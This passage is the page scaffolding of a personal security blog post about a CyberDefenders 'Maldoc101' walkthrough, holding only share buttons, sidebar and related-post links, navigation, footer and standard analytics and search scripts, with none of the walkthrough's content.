href="https://twitter.com/intent/tweet?text=CyberDefenders.org - Maldoc101 Walkthrough - Notepad+++&url=https://remotephone.github.io/posts/CyberDefenders_maldoc101/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=CyberDefenders.org - Maldoc101 Walkthrough - Notepad+++&u=https://remotephone.github.io/posts/CyberDefenders_maldoc101/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=CyberDefenders.org - Maldoc101 Walkthrough - Notepad+++&url=https://remotephone.github.io/posts/CyberDefenders_maldoc101/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/what-is-markdown/">What is Markdown anyway?</a></li><li><a href="/posts/welcome-to-jekyll/">Welcome to My Scratchpad</a></li><li><a href="/posts/reverse-shell-cheatsheet/">Reverse Shell Cheat Sheet</a></li><li><a href="/posts/practical-docker-part2/">Practical Docker for Security Admins - Part 2</a></li><li><a href="/posts/practical-docker/">Practical Docker for Security Admins - Part 1</a></li></ul></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Messing-Around-With-Memory-Dumps/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Feb 2, 2020 <i class="unloaded">2020-02-02T23:00:00-06:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Messing Around with Memory Dumps</h3><div class="text-muted small"><p> Why am I here? This handy tweet was posted on twitter sharing a memory dump to look into. I don’t do much of any memory analysis at work, so I figured I’d stumble through this, write what I found,...</p></div></div></a></div><div class="card"> <a href="/posts/CyberDefenders_MTA/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Apr 8, 2021 <i class="unloaded">2021-04-08T01:40:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>CyberDefenders.org - Malware Traffic Analysis Walktrhough</h3><div class="text-muted small"><p> CyberDefenders.org CyberDefenders is a free, community built site hosting security challenges. I’d heard about this site and it’s interesting, so I thought I’d use a little bit of the pandemic to ...</p></div></div></a></div><div class="card"> <a href="/posts/CyberDefenders_Obfuscated/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Oct 20, 2021 <i class="unloaded">2021-10-20T11:24:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>CyberDefenders - Obfuscated</h3><div class="text-muted small"><p> Obfuscated Back again for another CyberDefenders post. This is Obfuscated and I’ll work this like the last one, poke around before I answer any questions. The prompt again is pretty simple, you g...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/CyberDefenders_MTA/" class="btn btn-outline-primary"><p>CyberDefenders.org - Malware Traffic Analysis Walktrhough</p></a> <a href="/posts/CyberDefenders_macos_spotlight/" class="btn btn-outline-primary"><p>CyberDefenders.org - macOS Spotlight - Forensics Walkthrough</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/remotephone">remotephone</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-158754701-1', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://remotephone.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
